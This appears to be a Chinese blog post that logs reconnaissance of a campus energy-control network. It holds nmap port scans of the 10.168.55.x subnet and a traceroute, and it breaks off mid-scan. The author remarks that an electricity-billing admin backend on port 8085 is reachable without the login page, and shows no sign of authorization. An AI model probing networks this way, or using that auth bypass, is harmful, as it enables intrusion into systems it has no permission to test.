2024-10-01 15:37:08
不知道是哪个前辈扫出来能源控制系统的内网ip是10.168.55.50,也是有实力的。
拿到ip之后惯例nmap扫描一下:
Nmap scan report for 10.168.55.50
Host is up (0.0049s latency).
Not shown: 976 closed tcp ports (conn-refused)
PORT STATE SERVICE
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
1521/tcp open oracle
3389/tcp filtered ms-wbt-server
8080/tcp open http-proxy
8081/tcp open blackice-icecap
8085/tcp open unknown
8089/tcp open unknown
8099/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown其中的8085是个tcp,协议居然是http。打开就能看到电费管理系统的后台。然而这个系统的80登陆界面实际上只是鉴权后跳转到8085端口,属实是无效鉴权了。
再看看traceroute:
traceroute to 10.168.55.50 (10.168.55.50), 30 hops max, 60 byte packets
1 _gateway (10.0.0.1) 3.217 ms 2.980 ms 2.926 ms
2 10.194.255.254 (10.194.255.254) 5.266 ms 4.524 ms 4.909 ms
3 172.16.14.49 (172.16.14.49) 4.665 ms 4.644 ms 4.816 ms
4 172.16.14.6 (172.16.14.6) 3.737 ms 3.632 ms 4.160 ms
5 172.16.14.9 (172.16.14.9) 50.871 ms 50.847 ms 50.905 ms
6 172.16.11.21 (172.16.11.21) 5.327 ms 3.495 ms 3.551 ms
7 10.168.55.1 (10.168.55.1) 3.600 ms 4.140 ms 4.099 ms
8 10.168.55.50 (10.168.55.50) 4.229 ms 4.216 ms 4.204 ms明显能观察到校园网的路由结构。10.194网段是校园网的大内网网段,然后跳到了172.16.14网段,可能是其中某个子网?
那继续看看这个10.168网段是什么情况吧:
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-01 15:50 CST
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 256 undergoing Ping Scan
Ping Scan Timing: About 57.52% done; ETC: 15:50 (0:00:03 remaining)
Nmap scan report for 10.168.55.26
Host is up (0.014s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.32
Host is up (0.014s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
3306/tcp open mysql
3389/tcp filtered ms-wbt-server
5985/tcp open wsman
8001/tcp open vcom-tunnel
Nmap scan report for 10.168.55.33
Host is up (0.013s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
3306/tcp open mysql
3389/tcp filtered ms-wbt-server
5985/tcp open wsman
Nmap scan report for 10.168.55.50
Host is up (0.011s latency).
Not shown: 976 closed tcp ports (conn-refused)
PORT STATE SERVICE
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
1521/tcp open oracle
3389/tcp filtered ms-wbt-server
8080/tcp open http-proxy
8081/tcp open blackice-icecap
8085/tcp open unknown
8089/tcp open unknown
8099/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
Nmap scan report for 10.168.55.53
Host is up (0.013s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.54
Host is up (0.012s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 10.168.55.55
Host is up (0.0059s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
8080/tcp closed http-proxy
Nmap scan report for 10.168.55.56
Host is up (0.012s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap scan report for 10.168.55.57
Host is up (0.014s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
3389/tcp filtered ms-wbt-server
4899/tcp open radmin
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap scan report for 10.168.55.59
Host is up (0.012s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1521/tcp open oracle
3389/tcp filtered ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
Nmap scan report for 10.168.55.61
Host is up (0.0063s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
1433/tcp open ms-sql-s
1521/tcp closed oracle
5500/tcp open hotline
6001/tcp open X11:1
9898/tcp closed monkeycom
50001/tcp closed unknown
Nmap scan report for 10.168.55.67
Host is up (0.011s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.69
Host is up (0.011s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
8080/tcp open http-proxy
Nmap scan report for 10.168.55.70
Host is up (0.014s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
8080/tcp open http-proxy
8082/tcp open blackice-alerts
8083/tcp open us-srv
8090/tcp open opsmessaging
9100/tcp open jetdirect
Nmap scan report for 10.168.55.72
Host is up (0.014s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1521/tcp open oracle
3389/tcp filtered ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49165/tcp open unknown
49167/tcp open unknown
Nmap scan report for 10.168.55.73
Host is up (0.012s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
3389/tcp filtered ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Nmap scan report for 10.168.55.77
Host is up (0.010s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.78
Host is up (0.013s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.100
Host is up (0.013s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.101
Host is up (0.014s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.102
Host is up (0.013s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.103
Host is up (0.011s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.104
Host is up (0.015s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.105
Host is up (0.015s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.106
Host is up (0.021s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.107
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.108
Host is up (0.011s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.109
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.110
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.111
Host is up (0.014s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.112
Host is up (0.013s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.113
Host is up (0.013s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.115
Host is up (0.015s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.119
Host is up (0.011s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.120
Host is up (0.011s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.122
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.123
Host is up (0.016s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.124
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.125
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.126
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.127
Host is up (0.012s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
Nmap scan report for 10.168.55.129
Host is up (0.012s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
5555/tcp open freeciv
Nmap scan report for 10.168.55.133
Host is up (0.012s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
9100/tcp open jetdirect
Nmap scan report for 10.168.55.134
Host is up (0.012s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
8001/tcp open vcom-tunnel
8002/tcp open teradataordbms
9100/tcp open jetdirect
30000/tcp open ndmps
Nmap scan report for 10.168.55.135
Host is up (0.012s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3306/tcp open mysql
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.136
Host is up (0.013s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
5357/tcp filtered wsdapi
8000/tcp filtered http-alt
8443/tcp filtered https-alt
9200/tcp filtered wap-wsp
10001/tcp open scp-config
Nmap scan report for 10.168.55.150
Host is up (0.0031s latency).
Not shown: 945 filtered tcp ports (no-response), 21 filtered tcp ports (host-unreach), 30 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
443/tcp open https
8181/tcp open intermapper
Nmap scan report for 10.168.55.151
Host is up (0.0085s latency).
Not shown: 952 filtered tcp ports (no-response), 14 filtered tcp ports (host-unreach), 30 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
443/tcp open https
8181/tcp open intermapper
Nmap scan report for 10.168.55.152
Host is up (0.0096s latency).
Not shown: 947 filtered tcp ports (no-response), 14 filtered tcp ports (host-unreach), 35 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
443/tcp open https
8181/tcp open intermapper
Nmap scan report for 10.168.55.155
Host is up (0.013s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1028/tcp open unknown
1030/tcp open iad1
1038/tcp open mtqp
1039/tcp open sbl
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.156
Host is up (0.012s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.157
Host is up (0.012s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Nmap scan report for 10.168.55.161
Host is up (0.0063s latency).
Not shown: 981 filtered tcp ports (no-response), 15 filtered tcp ports (host-unreach)
PORT STATE SERVICE
53/tcp open domain
80/tcp closed http
8088/tcp open radan-http
8089/tcp open unknown
Nmap scan report for 10.168.55.162
Host is up (0.015s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
8443/tcp open https-alt
Nmap scan report for 10.168.55.163
Host is up (0.013s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
8443/tcp open https-alt
Nmap scan report for 10.168.55.164
Host is up (0.013s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
3389/tcp filtered ms-wbt-server
8000/tcp open http-alt
8443/tcp open https-alt
Nmap scan report for 10.168.55.200
Host is up (0.013s latency).
Not shown: 984 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
3389/tcp filtered ms-wbt-server
6000/tcp open X11
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49167/tcp open unknown
Nmap scan report for 10.168.55.206
Host is up (0.0047s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
81/tcp open hosts2-ns
1433/tcp open ms-sql-s
49154/tcp open unknown
Nmap scan report for 10.168.55.208
Host is up (0.013s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
8084/tcp open websnp
Nmap scan report for 10.168.55.219
Host is up (0.015s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
6000/tcp open X11
8084/tcp open websnp
8089/tcp open unknown
9876/tcp open sd
Nmap scan report for 10.168.55.220
Host is up (0.016s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
691/tcp open resvc
3389/tcp filtered ms-wbt-server
8088/tcp open radan-http
Nmap scan report for 10.168.55.221
Host is up (0.015s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
3389/tcp filtered ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 10.168.55.232
Host is up (0.013s latency).
Not shown: 947 closed tcp ports (conn-refused)
PORT STATE SERVICE
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
2000/tcp open cisco-sccp
2001/tcp open dc
2002/tcp open globe
2003/tcp open finger
2004/tcp open mailbox
2005/tcp open deslogin
2006/tcp open invokator
2007/tcp open dectalk
2008/tcp open conf
2009/tcp open news
2010/tcp open search
2013/tcp open raid-am
2020/tcp open xinupageserver
2021/tcp open servexec
2022/tcp open down
2030/tcp open device2
2033/tcp open glogger
2034/tcp open scoremgr
2035/tcp open imsldoc
2038/tcp open objectmanager
2040/tcp open lam
2041/tcp open interbase
2043/tcp open isis-bcast
2045/tcp open cdfunc
2046/tcp open sdfunc
2047/tcp open dls
2048/tcp open dls-monitor
2049/tcp open nfs
2065/tcp open dlsrpn
2068/tcp open avocentkvm
3389/tcp filtered ms-wbt-server
5985/tcp open wsman
8009/tcp open ajp13
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap scan report for 10.168.55.233
Host is up (0.013s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1521/tcp open oracle
3389/tcp filtered ms-wbt-server
5560/tcp open isqlplus
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49157/tcp open unknown
Nmap scan report for 10.168.55.234
Host is up (0.0090s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
3389/tcp filtered ms-wbt-server
9000/tcp open cslistener
9001/tcp open tor-orport
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49161/tcp open unknown
Nmap scan report for 10.168.55.236
Host is up (0.0041s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
Nmap scan report for 10.168.55.239
Host is up (3.2s latency).
Not shown: 848 filtered tcp ports (no-response), 137 filtered tcp ports (host-unreach)
PORT STATE SERVICE
25/tcp closed smtp
53/tcp open domain
80/tcp open http
111/tcp closed rpcbind
443/tcp closed https
631/tcp closed ipp
1521/tcp closed oracle
6000/tcp open X11
8008/tcp closed http
8080/tcp closed http-proxy
8085/tcp closed unknown
8088/tcp closed radan-http
8194/tcp closed sophos
8899/tcp closed ospf-lite
9100/tcp open jetdirect
Nmap scan report for 10.168.55.244
Host is up (0.0053s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
6000/tcp open X11
8089/tcp open unknown
9100/tcp open jetdirect
Nmap scan report for 10.168.55.245
Host is up (0.0043s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
111/tcp open rpcbind
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
6000/tcp open X11
8080/tcp open http-proxy
8082/tcp open blackice-alerts
8083/tcp open us-srv
8085/tcp open unknown
8086/tcp open d-s-n
8088/tcp open radan-http
9080/tcp open glrpc
9100/tcp open jetdirect
9101/tcp open jetdirect
9102/tcp open jetdirect
9103/tcp open jetdirect
Nmap scan report for 10.168.55.246
Host is up (0.010s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
6000/tcp open X11
Nmap scan report for 10.168.55.248
